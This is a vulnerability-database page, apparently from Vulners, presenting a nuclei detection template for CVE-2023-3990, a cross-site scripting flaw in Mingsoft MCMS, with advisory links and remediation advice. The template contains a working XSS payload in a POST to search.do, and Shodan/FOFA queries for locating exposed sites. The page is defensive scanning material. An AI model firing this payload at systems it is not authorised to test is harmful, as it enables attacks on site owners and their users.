Lucene search
K

Mingsoft MCMS < 5.3.1 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Mingsoft MCMS < 5.3.1 has a medium severity cross-site scripting vulnerability affecting remote access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-3990
28 Jul 202312:29
circl
CNNVD
MingSoft MCMS 跨站脚本漏洞
28 Jul 202300:00
cnnvd
CVE
CVE-2023-3990
28 Jul 202307:00
cve
Cvelist
CVE-2023-3990 Mingsoft MCMS HTTP POST Request search.do cross site scripting
28 Jul 202307:00
cvelist
EUVD
EUVD-2023-2144
28 Jul 202307:00
euvd
Github Security Blog
Cross-site Scripting in Mingsoft MCMS
28 Jul 202309:30
github
NVD
CVE-2023-3990
28 Jul 202307:15
nvd
OSV
CVE-2023-3990
28 Jul 202307:15
osv
OSV
GHSA-RXVJ-5MV6-J5MC Cross-site Scripting in Mingsoft MCMS
28 Jul 202309:30
osv
Prion
Cross site scripting
28 Jul 202307:15
prion
Rows per page
id: CVE-2023-3990

info:
  name: Mingsoft MCMS < 5.3.1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    We recommend that you update to the latest version 5.4 or above.
  reference:
    - https://gitee.com/mingSoft/MCMS/issues/I7K4DQ
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3990
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-3990
    cwe-id: CWE-79
    epss-score: 0.01365
    epss-percentile: 0.68479
    cpe: cpe:2.3:a:mingsoft:mcms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: mingsoft
    product: mcms
    shodan-query: http.favicon.hash:1464851260
    fofa-query: icon_hash="1464851260"
  tags: cve,cve2023,mingsoft,mcms,xss,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "mingsoft.net"
        internal: true

  - raw:
      - |
        POST /mcms/search.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        content_title=1&style=%3CScRiPt%3Ealert(document.domain)%3C%2FScRiPt%3Ealert

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<ScRiPt>alert(document.domain)</ScRiPt>alert"

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e3a87dd0db071a306bade1921a27f4b4e0af621fbb5c36c39ae24f9e1bf830f402203077327b8a356275552f5246d3c43ea631b3bf40a58d432ba8a2b4b666067d90:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
3.8Low risk
Vulners AI Score3.8
CVSS 3.13.5 - 6.1
CVSS 24
CVSS 33.5
EPSS0.01365
27